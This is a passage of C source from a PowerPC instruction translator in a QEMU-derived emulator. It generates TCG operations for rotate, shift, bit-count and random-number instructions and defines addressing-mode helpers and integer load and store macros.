TCGv rs = cpu_gpr[rS(ctx->opcode)]; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, rs, 32); tcg_gen_xor_tl(tcg_ctx, ra, rs, t0); tcg_gen_shri_tl(tcg_ctx, t0, ra, 16); tcg_gen_xor_tl(tcg_ctx, ra, ra, t0); tcg_gen_shri_tl(tcg_ctx, t0, ra, 8); tcg_gen_xor_tl(tcg_ctx, ra, ra, t0); tcg_gen_andi_tl(tcg_ctx, ra, ra, 1); tcg_temp_free(tcg_ctx, t0); } #endif #if defined(TARGET_PPC64) /* bpermd */ static void gen_bpermd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_bpermd(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } #endif #if defined(TARGET_PPC64) /* extsw & extsw. */ GEN_LOGICAL1(extsw, tcg_gen_ext32s_tl, 0x1E, PPC_64B); /* cntlzd */ static void gen_cntlzd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_clzi_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], 64); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* cnttzd */ static void gen_cnttzd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ctzi_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], 64); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* darn */ static void gen_darn(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int l = L(ctx->opcode); if (l > 2) { tcg_gen_movi_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], -1); } else { if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } if (l == 0) { gen_helper_darn32(tcg_ctx, cpu_gpr[rD(ctx->opcode)]); } else { /* Return 64-bit random for both CRN and RRN */ gen_helper_darn64(tcg_ctx, cpu_gpr[rD(ctx->opcode)]); } if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_stop_exception(ctx); } } } #endif /*** Integer rotate ***/ /* rlwimi & rlwimi. 
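   Fast path: when the rotated field lands exactly where the mask
   keeps it (sh == 31 - me and mb <= me), the whole rotate-and-insert
   collapses into a single deposit op; otherwise the code rotates,
   masks, and merges by hand.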
*/ static void gen_rlwimi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; uint32_t sh = SH(ctx->opcode); uint32_t mb = MB(ctx->opcode); uint32_t me = ME(ctx->opcode); if (sh == (31 - me) && mb <= me) { tcg_gen_deposit_tl(tcg_ctx, t_ra, t_ra, t_rs, sh, me - mb + 1); } else { target_ulong mask; TCGv t1; #if defined(TARGET_PPC64) mb += 32; me += 32; #endif mask = MASK(mb, me); t1 = tcg_temp_new(tcg_ctx); if (mask <= 0xffffffffu) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, t_rs); tcg_gen_rotli_i32(tcg_ctx, t0, t0, sh); tcg_gen_extu_i32_tl(tcg_ctx, t1, t0); tcg_temp_free_i32(tcg_ctx, t0); } else { #if defined(TARGET_PPC64) tcg_gen_deposit_i64(tcg_ctx, t1, t_rs, t_rs, 32, 32); tcg_gen_rotli_i64(tcg_ctx, t1, t1, sh); #else g_assert_not_reached(); #endif } tcg_gen_andi_tl(tcg_ctx, t1, t1, mask); tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, ~mask); tcg_gen_or_tl(tcg_ctx, t_ra, t_ra, t1); tcg_temp_free(tcg_ctx, t1); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } /* rlwinm & rlwinm. */ static void gen_rlwinm(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; int sh = SH(ctx->opcode); int mb = MB(ctx->opcode); int me = ME(ctx->opcode); int len = me - mb + 1; int rsh = (32 - sh) & 31; if (sh != 0 && len > 0 && me == (31 - sh)) { tcg_gen_deposit_z_tl(tcg_ctx, t_ra, t_rs, sh, len); } else if (me == 31 && rsh + len <= 32) { tcg_gen_extract_tl(tcg_ctx, t_ra, t_rs, rsh, len); } else { target_ulong mask; #if defined(TARGET_PPC64) mb += 32; me += 32; #endif mask = MASK(mb, me); if (mask <= 0xffffffffu) { if (sh == 0) { tcg_gen_andi_tl(tcg_ctx, t_ra, t_rs, mask); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, t_rs); tcg_gen_rotli_i32(tcg_ctx, t0, t0, sh); tcg_gen_andi_i32(tcg_ctx, t0, t0, mask); tcg_gen_extu_i32_tl(tcg_ctx, t_ra, t0); tcg_temp_free_i32(tcg_ctx, t0); } } else { #if defined(TARGET_PPC64) tcg_gen_deposit_i64(tcg_ctx, t_ra, t_rs, t_rs, 32, 32); tcg_gen_rotli_i64(tcg_ctx, t_ra, t_ra, sh); tcg_gen_andi_i64(tcg_ctx, t_ra, t_ra, mask); #else g_assert_not_reached(); #endif } } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } /* rlwnm & rlwnm. 
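   For masks wider than 32 bits on a 64-bit target, the 32-bit rotate
   is synthesised by duplicating the low word into the high half
   (deposit ..., 32, 32) and doing one 64-bit rotl, so bits leaving
   bit 31 re-enter at bit 0.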
*/ static void gen_rlwnm(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; TCGv t_rb = cpu_gpr[rB(ctx->opcode)]; uint32_t mb = MB(ctx->opcode); uint32_t me = ME(ctx->opcode); target_ulong mask; #if defined(TARGET_PPC64) mb += 32; me += 32; #endif mask = MASK(mb, me); if (mask <= 0xffffffffu) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, t_rb); tcg_gen_trunc_tl_i32(tcg_ctx, t1, t_rs); tcg_gen_andi_i32(tcg_ctx, t0, t0, 0x1f); tcg_gen_rotl_i32(tcg_ctx, t1, t1, t0); tcg_gen_extu_i32_tl(tcg_ctx, t_ra, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } else { #if defined(TARGET_PPC64) TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t0, t_rb, 0x1f); tcg_gen_deposit_i64(tcg_ctx, t_ra, t_rs, t_rs, 32, 32); tcg_gen_rotl_i64(tcg_ctx, t_ra, t_ra, t0); tcg_temp_free_i64(tcg_ctx, t0); #else g_assert_not_reached(); #endif } tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, mask); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } #if defined(TARGET_PPC64) #define GEN_PPC64_R2(name, opc1, opc2) \ static void glue(gen_, name##0)(DisasContext *ctx) \ { \ gen_##name(ctx, 0); \ } \ \ static void glue(gen_, name##1)(DisasContext *ctx) \ { \ gen_##name(ctx, 1); \ } #define GEN_PPC64_R4(name, opc1, opc2) \ static void glue(gen_, name##0)(DisasContext *ctx) \ { \ gen_##name(ctx, 0, 0); \ } \ \ static void glue(gen_, name##1)(DisasContext *ctx) \ { \ gen_##name(ctx, 0, 1); \ } \ \ static void glue(gen_, name##2)(DisasContext *ctx) \ { \ gen_##name(ctx, 1, 0); \ } \ \ static void glue(gen_, name##3)(DisasContext *ctx) \ { \ gen_##name(ctx, 1, 1); \ } static void gen_rldinm(DisasContext *ctx, int mb, int me, int sh) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; int len = me - mb + 1; int rsh = (64 - sh) & 63; if (sh != 0 && len > 0 && me == (63 - sh)) { tcg_gen_deposit_z_tl(tcg_ctx, t_ra, t_rs, sh, len); } else if (me == 63 && rsh + len <= 64) { tcg_gen_extract_tl(tcg_ctx, t_ra, t_rs, rsh, len); } else { tcg_gen_rotli_tl(tcg_ctx, t_ra, t_rs, sh); tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, MASK(mb, me)); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } /* rldicl - rldicl. */ static inline void gen_rldicl(DisasContext *ctx, int mbn, int shn) { uint32_t sh, mb; sh = SH(ctx->opcode) | (shn << 5); mb = MB(ctx->opcode) | (mbn << 5); gen_rldinm(ctx, mb, 63, sh); } GEN_PPC64_R4(rldicl, 0x1E, 0x00); /* rldicr - rldicr. */ static inline void gen_rldicr(DisasContext *ctx, int men, int shn) { uint32_t sh, me; sh = SH(ctx->opcode) | (shn << 5); me = MB(ctx->opcode) | (men << 5); gen_rldinm(ctx, 0, me, sh); } GEN_PPC64_R4(rldicr, 0x1E, 0x02); /* rldic - rldic. 
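   rldic rotates left by sh and keeps only MASK(mb, 63 - sh), i.e. it
   clears the low sh bits and the top mb bits, so gen_rldinm is simply
   reused with me = 63 - sh.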
*/ static inline void gen_rldic(DisasContext *ctx, int mbn, int shn) { uint32_t sh, mb; sh = SH(ctx->opcode) | (shn << 5); mb = MB(ctx->opcode) | (mbn << 5); gen_rldinm(ctx, mb, 63 - sh, sh); } GEN_PPC64_R4(rldic, 0x1E, 0x04); static void gen_rldnm(DisasContext *ctx, int mb, int me) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; TCGv t_rb = cpu_gpr[rB(ctx->opcode)]; TCGv t0; t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, t_rb, 0x3f); tcg_gen_rotl_tl(tcg_ctx, t_ra, t_rs, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, MASK(mb, me)); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } /* rldcl - rldcl. */ static inline void gen_rldcl(DisasContext *ctx, int mbn) { uint32_t mb; mb = MB(ctx->opcode) | (mbn << 5); gen_rldnm(ctx, mb, 63); } GEN_PPC64_R2(rldcl, 0x1E, 0x08); /* rldcr - rldcr. */ static inline void gen_rldcr(DisasContext *ctx, int men) { uint32_t me; me = MB(ctx->opcode) | (men << 5); gen_rldnm(ctx, 0, me); } GEN_PPC64_R2(rldcr, 0x1E, 0x09); /* rldimi - rldimi. */ static void gen_rldimi(DisasContext *ctx, int mbn, int shn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; uint32_t sh = SH(ctx->opcode) | (shn << 5); uint32_t mb = MB(ctx->opcode) | (mbn << 5); uint32_t me = 63 - sh; if (mb <= me) { tcg_gen_deposit_tl(tcg_ctx, t_ra, t_ra, t_rs, sh, me - mb + 1); } else { target_ulong mask = MASK(mb, me); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_rotli_tl(tcg_ctx, t1, t_rs, sh); tcg_gen_andi_tl(tcg_ctx, t1, t1, mask); tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, ~mask); tcg_gen_or_tl(tcg_ctx, t_ra, t_ra, t1); tcg_temp_free(tcg_ctx, t1); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } GEN_PPC64_R4(rldimi, 0x1E, 0x06); #endif /*** Integer shift ***/ /* slw & slw. */ static void gen_slw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); /* AND rS with a mask that is 0 when rB >= 0x20 */ #if defined(TARGET_PPC64) tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x3a); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x3f); #else tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1a); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x1f); #endif tcg_gen_andc_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1f); tcg_gen_shl_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); tcg_gen_ext32u_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sraw & sraw. */ static void gen_sraw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_sraw(tcg_ctx, cpu_gpr[rA(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srawi & srawi. 
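   CA must be 1 only when the source is negative and 1-bits are
   shifted out, hence the and of the low sh bits with a replicated
   sign bit before the final setcond != 0 below.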
*/ static void gen_srawi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv dst = cpu_gpr[rA(ctx->opcode)]; TCGv src = cpu_gpr[rS(ctx->opcode)]; if (sh == 0) { tcg_gen_ext32s_tl(tcg_ctx, dst, src); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); if (is_isa300(ctx)) { tcg_gen_movi_tl(tcg_ctx, cpu_ca32, 0); } } else { TCGv t0; tcg_gen_ext32s_tl(tcg_ctx, dst, src); tcg_gen_andi_tl(tcg_ctx, cpu_ca, dst, (1ULL << sh) - 1); t0 = tcg_temp_new(tcg_ctx); tcg_gen_sari_tl(tcg_ctx, t0, dst, TARGET_LONG_BITS - 1); tcg_gen_and_tl(tcg_ctx, cpu_ca, cpu_ca, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, cpu_ca, cpu_ca, 0); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ca32, cpu_ca); } tcg_gen_sari_tl(tcg_ctx, dst, dst, sh); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, dst); } } /* srw & srw. */ static void gen_srw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); /* AND rS with a mask that is 0 when rB >= 0x20 */ #if defined(TARGET_PPC64) tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x3a); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x3f); #else tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1a); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x1f); #endif tcg_gen_andc_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1f); tcg_gen_shr_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } #if defined(TARGET_PPC64) /* sld & sld. */ static void gen_sld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); /* AND rS with a mask that is 0 when rB >= 0x40 */ tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x39); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_andc_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x3f); tcg_gen_shl_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srad & srad. */ static void gen_srad(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_srad(tcg_ctx, cpu_gpr[rA(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sradi & sradi. 
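   The 6-bit shift count is split across the encoding: sh = SH(opcode)
   plus one extra high bit n, so the two decode stubs gen_sradi0 and
   gen_sradi1 feed the shared gen_sradi.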
*/ static inline void gen_sradi(DisasContext *ctx, int n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode) + (n << 5); TCGv dst = cpu_gpr[rA(ctx->opcode)]; TCGv src = cpu_gpr[rS(ctx->opcode)]; if (sh == 0) { tcg_gen_mov_tl(tcg_ctx, dst, src); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); if (is_isa300(ctx)) { tcg_gen_movi_tl(tcg_ctx, cpu_ca32, 0); } } else { TCGv t0; tcg_gen_andi_tl(tcg_ctx, cpu_ca, src, (1ULL << sh) - 1); t0 = tcg_temp_new(tcg_ctx); tcg_gen_sari_tl(tcg_ctx, t0, src, TARGET_LONG_BITS - 1); tcg_gen_and_tl(tcg_ctx, cpu_ca, cpu_ca, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, cpu_ca, cpu_ca, 0); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ca32, cpu_ca); } tcg_gen_sari_tl(tcg_ctx, dst, src, sh); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, dst); } } static void gen_sradi0(DisasContext *ctx) { gen_sradi(ctx, 0); } static void gen_sradi1(DisasContext *ctx) { gen_sradi(ctx, 1); } /* extswsli & extswsli. */ static inline void gen_extswsli(DisasContext *ctx, int n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode) + (n << 5); TCGv dst = cpu_gpr[rA(ctx->opcode)]; TCGv src = cpu_gpr[rS(ctx->opcode)]; tcg_gen_ext32s_tl(tcg_ctx, dst, src); tcg_gen_shli_tl(tcg_ctx, dst, dst, sh); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, dst); } } static void gen_extswsli0(DisasContext *ctx) { gen_extswsli(ctx, 0); } static void gen_extswsli1(DisasContext *ctx) { gen_extswsli(ctx, 1); } /* srd & srd. */ static void gen_srd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); /* AND rS with a mask that is 0 when rB >= 0x40 */ tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x39); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_andc_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x3f); tcg_gen_shr_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } #endif /*** Addressing modes ***/ /* Register indirect with immediate index : EA = (rA|0) + SIMM */ static inline void gen_addr_imm_index(DisasContext *ctx, TCGv EA, target_long maskl) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long simm = SIMM(ctx->opcode); simm &= ~maskl; if (rA(ctx->opcode) == 0) { if (NARROW_MODE(ctx)) { simm = (uint32_t)simm; } tcg_gen_movi_tl(tcg_ctx, EA, simm); } else if (likely(simm != 0)) { tcg_gen_addi_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)], simm); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, EA); } } else { if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)]); } else { tcg_gen_mov_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)]); } } } static inline void gen_addr_reg_index(DisasContext *ctx, TCGv EA) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (rA(ctx->opcode) == 0) { if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, cpu_gpr[rB(ctx->opcode)]); } else { tcg_gen_mov_tl(tcg_ctx, EA, cpu_gpr[rB(ctx->opcode)]); } } else { tcg_gen_add_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, EA); } } } static inline void gen_addr_register(DisasContext *ctx, TCGv EA) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (rA(ctx->opcode) == 0) { tcg_gen_movi_tl(tcg_ctx, EA, 0); } else if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)]); } else { 
tcg_gen_mov_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)]); } } static inline void gen_addr_add(DisasContext *ctx, TCGv ret, TCGv arg1, target_long val) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_addi_tl(tcg_ctx, ret, arg1, val); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, ret, ret); } } static inline void gen_align_no_le(DisasContext *ctx) { gen_exception_err(ctx, POWERPC_EXCP_ALIGN, (ctx->opcode & 0x03FF0000) | POWERPC_EXCP_ALIGN_LE); } /*** Integer load ***/ #define DEF_MEMOP(op) ((op) | ctx->default_tcg_memop_mask) #define BSWAP_MEMOP(op) ((op) | (ctx->default_tcg_memop_mask ^ MO_BSWAP)) #define GEN_QEMU_LOAD_TL(ldop, op) \ static void glue(gen_qemu_, ldop)(DisasContext *ctx, \ TCGv val, \ TCGv addr) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_gen_qemu_ld_tl(tcg_ctx, val, addr, ctx->mem_idx, op); \ } GEN_QEMU_LOAD_TL(ld8u, DEF_MEMOP(MO_UB)) GEN_QEMU_LOAD_TL(ld16u, DEF_MEMOP(MO_UW)) GEN_QEMU_LOAD_TL(ld16s, DEF_MEMOP(MO_SW)) GEN_QEMU_LOAD_TL(ld32u, DEF_MEMOP(MO_UL)) GEN_QEMU_LOAD_TL(ld32s, DEF_MEMOP(MO_SL)) GEN_QEMU_LOAD_TL(ld16ur, BSWAP_MEMOP(MO_UW)) GEN_QEMU_LOAD_TL(ld32ur, BSWAP_MEMOP(MO_UL)) #define GEN_QEMU_LOAD_64(ldop, op) \ static void glue(gen_qemu_, glue(ldop, _i64))(DisasContext *ctx, \ TCGv_i64 val, \ TCGv addr) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_gen_qemu_ld_i64(tcg_ctx, val, addr, ctx->mem_idx, op); \ } GEN_QEMU_LOAD_64(ld8u, DEF_MEMOP(MO_UB)) GEN_QEMU_LOAD_64(ld16u, DEF_MEMOP(MO_UW)) GEN_QEMU_LOAD_64(ld32u, DEF_MEMOP(MO_UL)) GEN_QEMU_LOAD_64(ld32s, DEF_MEMOP(MO_SL)) GEN_QEMU_LOAD_64(ld64, DEF_MEMOP(MO_Q)) #if defined(TARGET_PPC64) GEN_QEMU_LOAD_64(ld64ur, BSWAP_MEMOP(MO_Q)) #endif #define GEN_QEMU_STORE_TL(stop, op) \ static void glue(gen_qemu_, stop)(DisasContext *ctx, \ TCGv val, \ TCGv addr) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_gen_qemu_st_tl(tcg_ctx, val, addr, ctx->mem_idx, op); \ } GEN_QEMU_STORE_TL(st8, DEF_MEMOP(MO_UB)) GEN_QEMU_STORE_TL(st16, DEF_MEMOP(MO_UW)) GEN_QEMU_STORE_TL(st32, DEF_MEMOP(MO_UL)) GEN_QEMU_STORE_TL(st16r, BSWAP_MEMOP(MO_UW)) GEN_QEMU_STORE_TL(st32r, BSWAP_MEMOP(MO_UL)) #define GEN_QEMU_STORE_64(stop, op) \ static void glue(gen_qemu_, glue(stop, _i64))(DisasContext *ctx, \ TCGv_i64 val, \ TCGv addr) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_gen_qemu_st_i64(tcg_ctx, val, addr, ctx->mem_idx, op); \ } GEN_QEMU_STORE_64(st8, DEF_MEMOP(MO_UB)) GEN_QEMU_STORE_64(st16, DEF_MEMOP(MO_UW)) GEN_QEMU_STORE_64(st32, DEF_MEMOP(MO_UL)) GEN_QEMU_STORE_64(st64, DEF_MEMOP(MO_Q)) #if defined(TARGET_PPC64) GEN_QEMU_STORE_64(st64r, BSWAP_MEMOP(MO_Q)) #endif #define GEN_LD(name, ldop, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##ldop(ctx, cpu_gpr[rD(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_LDU(name, ldop, opc, type) \ static void glue(gen_, name##u)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ if (unlikely(rA(ctx->opcode) == 0 || \ rA(ctx->opcode) == rD(ctx->opcode))) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ if (type == PPC_64B) \ gen_addr_imm_index(ctx, EA, 0x03); \ else \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##ldop(ctx, cpu_gpr[rD(ctx->opcode)], EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define 
GEN_LDUX(name, ldop, opc2, opc3, type) \ static void glue(gen_, name##ux)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ if (unlikely(rA(ctx->opcode) == 0 || \ rA(ctx->opcode) == rD(ctx->opcode))) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##ldop(ctx, cpu_gpr[rD(ctx->opcode)], EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_LDX_E(name, ldop, opc2, opc3, type, type2, chk) \ static void glue(gen_, name##x)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ chk; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##ldop(ctx, cpu_gpr[rD(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_LDX(name, ldop, opc2, opc3, type) \ GEN_LDX_E(name, ldop, opc2, opc3, type, PPC_NONE, CHK_NONE) #define GEN_LDX_HVRM(name, ldop, opc2, opc3, type) \ GEN_LDX_E(name, ldop, opc2, opc3, type, PPC_NONE, CHK_HVRM) #define GEN_LDS(name, ldop, op, type) \ GEN_LD(name, ldop, op | 0x20, type); \ GEN_LDU(name, ldop, op | 0x21, type); \ GEN_LDUX(name, ldop, 0x17, op | 0x01, type); \ GEN_LDX(name, ldop, 0x17, op | 0x00, type) /* 